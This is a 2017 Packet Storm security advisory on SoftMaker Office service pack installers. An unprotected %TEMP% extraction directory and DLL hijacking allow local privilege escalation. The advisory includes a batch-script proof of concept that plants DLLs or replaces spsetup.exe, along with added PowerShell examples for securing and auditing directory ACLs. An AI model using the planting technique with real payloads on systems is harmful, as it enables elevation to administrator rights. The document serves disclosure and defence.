SoftMaker Office 201x Privilege Escalation

Published 04 Jan 2017 | Reported by Stefan Kanthak | Type: packetstorm | Source: packetstormsecurity.com

SoftMaker Office 201x Privilege Escalation vulnerability in executable installer

Hi @ll,  
  
the service pack installers for SoftMaker Office 201x, available  
from <http://www.softmaker.com/en/servicepacks-office-windows>,  
are (surprise.-) vulnerable.  
  
  
The executable installer (OUCH) ofw16_763.exe, a 7z SFX (OUCH),  
creates an UNPROTECTED directory "%TEMP%\7zSxxxxxxxx\" to extract  
its payload, then executes "%TEMP%\7zSxxxxxxxx\spsetup.exe".  
  
"%TEMP%\7zSxxxxxxxx\" inherits the NTFS access rights of its parent  
"%TEMP%\", i.e. allows full access for the UNPRIVILEGED user.  
  
For this well-known vulnerability see  
<https://cwe.mitre.org/data/definitions/377.html> and  
<https://cwe.mitre.org/data/definitions/379.html>  
  
  
Due to the embedded application manifest which specifies  
"requireAdministrator" the executable installer can only be run  
with administrative rights.  
  
JFTR: if written properly, it would create a PROTECTED directory  
"%TEMP%\7zSxxxxxxxx\", writable only for privileged users!  
  
The UNPRIVILEGED user as well as any program running with the  
user's credentials can modify the extracted files, for example  
"%TEMP%\7zSxxxxxxxx\spsetup.exe", which is executed with  
administrative rights, resulting in arbitrary code execution  
with elevation of privilege.  
  
Additionally "spsetup.exe" is vulnerable to DLL hijacking,  
another well-known vulnerability.  
See <https://capec.mitre.org/data/definitions/471.html>,  
<https://cwe.mitre.org/data/definitions/426.html>,  
<https://cwe.mitre.org/data/definitions/427.html>  
<https://technet.microsoft.com/en-us/library/2269637.aspx>,  
<https://msdn.microsoft.com/en-us/library/ff919712.aspx> and  
<https://msdn.microsoft.com/en-us/library/ms682586.aspx> plus  
<http://blogs.technet.com/b/srd/archive/2014/05/13/load-library-safely.aspx>  
  
Thanks to the unprotected directory "%TEMP%\7zSxxxxxxxx\" the  
unprivileged user can write DLLs to "%TEMP%\7zSxxxxxxxx\" which  
are loaded by "spsetup.exe", again resulting in arbitrary code  
execution with elevation of privilege!  
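The following is an added example (written for this page, not code from the advisory or from SoftMaker) showing the two halves of the issue above: how an installer should create its extraction directory so that it is writable only for privileged users, and how to audit an existing directory for the condition the advisory describes (an Allow ACE that gives the interactive user, Everyone, Authenticated Users or BUILTIN\Users any write right). It assumes Windows PowerShell 5.1 (.NET Framework) in an elevated session; the function names, the "7zSdemo*" directory names and the random-name scheme are this example's own.

```powershell
# Added example, not from the advisory: create a protected extraction directory and
# audit a directory for write access by unprivileged principals.
# Assumes Windows PowerShell 5.1 (.NET Framework) running elevated.
Set-StrictMode -Version Latest

function New-ProtectedTempDirectory {
    # Default name mimics the SFX's "7zSxxxxxxxx" pattern (hypothetical).
    param([string]$Name = ('7zS{0:X8}' -f (Get-Random)))
    $path = Join-Path $env:TEMP $Name
    $sec  = New-Object System.Security.AccessControl.DirectorySecurity
    # Cut inheritance so the unprivileged user's full-control ACE on %TEMP% is NOT copied.
    $sec.SetAccessRuleProtection($true, $false)
    $full    = [System.Security.AccessControl.FileSystemRights]::FullControl
    $inherit = [System.Security.AccessControl.InheritanceFlags]'ContainerInherit, ObjectInherit'
    $none    = [System.Security.AccessControl.PropagationFlags]::None
    foreach ($sid in 'S-1-5-18', 'S-1-5-32-544') {   # NT AUTHORITY\SYSTEM, BUILTIN\Administrators
        $id   = New-Object System.Security.Principal.SecurityIdentifier $sid
        $rule = [System.Security.AccessControl.FileSystemAccessRule]::new($id, $full, $inherit, $none, 'Allow')
        $sec.AddAccessRule($rule)
    }
    $sec.SetOwner((New-Object System.Security.Principal.SecurityIdentifier 'S-1-5-32-544'))
    # Handing the DACL to CreateDirectory applies it at creation time, so there is no
    # window in which the directory exists with the inherited, user-writable ACL.
    [System.IO.Directory]::CreateDirectory($path, $sec) | Out-Null
    return $path
}

function Test-WritableByUnprivileged {
    # Returns every Allow ACE that lets a non-privileged principal tamper with $Path.
    param([Parameter(Mandatory)][string]$Path)
    $acl       = Get-Acl -LiteralPath $Path
    $broadSids = 'S-1-1-0', 'S-1-5-11', 'S-1-5-32-545'   # Everyone, Authenticated Users, BUILTIN\Users
    $userSid   = [System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value
    # Specific rights that permit tampering, plus GENERIC_WRITE / GENERIC_ALL, which appear
    # unmapped in ACEs inherited from the user profile.
    $writeMask    = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'
    $genericWrite = 0x40000000
    $genericAll   = 0x10000000
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $sid  = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
        $mask = [int]$ace.FileSystemRights
        $canWrite = (($mask -band $writeMask) -ne 0) -or
                    (($mask -band $genericWrite) -ne 0) -or
                    (($mask -band $genericAll) -ne 0)
        if ($canWrite -and ($sid -eq $userSid -or $sid -in $broadSids)) { $ace }
    }
}

# Demonstration: a directory created the usual way inherits %TEMP%'s ACL and is reported
# as writable by the interactive user; the protected one is not.
$naive = New-Item -ItemType Directory -Path (Join-Path $env:TEMP '7zSdemoNaive') -Force
$safe  = New-ProtectedTempDirectory -Name '7zSdemoSafe'
foreach ($dir in $naive.FullName, $safe) {
    $hits = @(Test-WritableByUnprivileged -Path $dir)
    if ($hits.Count) { '{0}: WRITABLE by {1}' -f $dir, ($hits.IdentityReference -join ', ') }
    else             { '{0}: protected' -f $dir }
}
Remove-Item -LiteralPath $naive.FullName, $safe -Recurse -Force
```

Run it from an elevated prompt of the same account that would launch the installer: the first line of output names the account (the inherited ACE from "%TEMP%"), the second reports the explicitly secured directory as protected. Test-WritableByUnprivileged is also a quick way to check any "%TEMP%\7zS*" directory an SFX leaves behind while it runs.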
  
  
Proof-of-concept:  
~~~~~~~~~~~~~~~~~  
  
0. download <http://www.softmaker.net/down/ofw16_763.exe> and  
save it in an arbitrary directory;  
  
1. download <http://home.arcor.de/skanthak/download/SENTINEL.DLL>  
(see <http://home.arcor.de/skanthak/sentinel.html> alias  
<https://skanthak.homepage.t-online.de/sentinel.html>) and  
save it in an(other) arbitrary directory;  
  
2. save the following batch script in the same directory as  
SENTINEL.DLL:  
  
--- OFW16_763.CMD ---  
:WAIT  
@Rem spin until the SFX has created its "%TEMP%\7zSxxxxxxxx\" directory  
@If Not Exist "%TEMP%\7z*" Goto :WAIT  
@Rem pick up the name of the (last) matching directory  
For /D %%! In ("%TEMP%\7z*") Do Set foobar=%%!  
@Rem plant the DLLs that spsetup.exe loads from its own directory  
Copy "SENTINEL.DLL" "%foobar%\NTMARTA.DLL"  
Copy "SENTINEL.DLL" "%foobar%\VERSION.DLL"  
Copy "SENTINEL.DLL" "%foobar%\WINSPOOL.DRV"  
--- EOF ---  
  
3. start the batch script;  
  
4. execute ofw16_763.exe and notice the message boxes displayed  
by SENTINEL.DLL.  
  
PWNED!  
  
5. download <http://home.arcor.de/skanthak/download/SENTINEL.EXE>  
to the same directory as the batch script;  
  
6. in the batch script replace the 3 lines Copy ... with  
Copy "SENTINEL.EXE" "%foobar%\spsetup.exe"  
  
7. start the batch script;  
  
8. execute ofw16_763.exe and notice the message box displayed  
by SENTINEL.EXE.  
  
PWNED!  
  
  
Mitigations:  
~~~~~~~~~~~~  
  
* Don't use executable installers! NEVER!  
Don't use self-extractors! NEVER!  
  
See <http://seclists.org/fulldisclosure/2015/Nov/101> and  
<http://seclists.org/fulldisclosure/2015/Dec/86> plus  
<http://home.arcor.de/skanthak/!execute.html> alias  
<https://skanthak.homepage.t-online.de/!execute.html> for more  
information.  
  
* Practice STRICT privilege separation: NEVER use the so-called  
"protected" administrator account(s) created during Windows  
setup which use the same "%TEMP%" for unprivileged and privileged  
processes!  
  
* Add an ACE "(D;OIIO;WP;;;WD)" to the ACL of every "%USERPROFILE%";  
use <https://msdn.microsoft.com/en-us/library/aa374928.aspx> to  
decode it to "deny execution of files in this directory for  
everyone, inheritable to all files in all subdirectories".  
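As an added example (not part of the advisory), the ACE from the last mitigation decoded with the .NET security classes rather than by hand, and applied as the equivalent FileSystemAccessRule. Assumes Windows PowerShell 5.1 in an elevated session; the function names are this example's own.

```powershell
# Added example, not from the advisory: decode "(D;OIIO;WP;;;WD)" and apply it.
# Assumes Windows PowerShell 5.1 running elevated.
Set-StrictMode -Version Latest

function ConvertFrom-SddlDacl {
    # Expands each ACE of a DACL given in SDDL into type, inheritance flags, rights and principal.
    param([Parameter(Mandatory)][string]$Sddl)   # e.g. 'D:(D;OIIO;WP;;;WD)'
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor $Sddl
    foreach ($ace in $sd.DiscretionaryAcl) {
        $who = $ace.SecurityIdentifier.Value
        try { $who = $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value } catch {}
        [pscustomobject]@{
            Type      = $ace.AceType      # AccessDenied                ("D")
            Flags     = $ace.AceFlags     # ObjectInherit, InheritOnly  ("OIIO")
            Rights    = [System.Security.AccessControl.FileSystemRights]$ace.AccessMask  # 0x20 = ExecuteFile ("WP")
            Principal = $who              # Everyone, S-1-1-0           ("WD")
        }
    }
}

function Add-DenyExecuteBelow {
    # Adds the same ACE to $Path. ObjectInherit without ContainerInherit, plus InheritOnly:
    # the directory itself is untouched (traversal keeps working), every file below it gets
    # the deny, and subdirectories carry it on as inherit-only so it reaches files at any depth.
    param([Parameter(Mandatory)][string]$Path)
    $everyone = New-Object System.Security.Principal.SecurityIdentifier 'S-1-1-0'
    $rule = [System.Security.AccessControl.FileSystemAccessRule]::new(
        $everyone,
        [System.Security.AccessControl.FileSystemRights]::ExecuteFile,
        [System.Security.AccessControl.InheritanceFlags]::ObjectInherit,
        [System.Security.AccessControl.PropagationFlags]::InheritOnly,
        [System.Security.AccessControl.AccessControlType]::Deny)
    $acl = Get-Acl -LiteralPath $Path
    $acl.AddAccessRule($rule)
    Set-Acl -LiteralPath $Path -AclObject $acl
}

# Show the decoded ACE; the Add-* call is left commented out because it changes a live profile.
ConvertFrom-SddlDacl -Sddl 'D:(D;OIIO;WP;;;WD)' | Format-List
# Add-DenyExecuteBelow -Path $env:USERPROFILE
# Equivalent one-liner with the built-in tool: icacls "%USERPROFILE%" /deny *S-1-1-0:(OI)(IO)(X)
```

Two caveats before rolling this out: FILE_EXECUTE is what CreateProcess and image mapping (LoadLibrary) check, so the deny also stops every program that installs itself per-user below "%LOCALAPPDATA%"; interpreters only read script files, so scripts are unaffected and this is not a substitute for an application whitelist. Remove the rule with RemoveAccessRule on the same FileSystemAccessRule (or icacls /remove:d) if it has to be rolled back.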
  
  
stay tuned  
Stefan Kanthak  
  
  
Timeline:  
~~~~~~~~~  
  
2016-12-15 sent vulnerability report to vendor  
  
no reply, not even an acknowledgement of receipt  
  
2016-12-23 resent vulnerability report to vendor, cc CERT at   
German BSI  
  
no reply, not even an acknowledgement of receipt  
  
2016-12-27 CERT at German BSI contacts vendor offering help  
  
no reply, not even an acknowledgement of receipt  
  
2016-12-31 report published  
  
  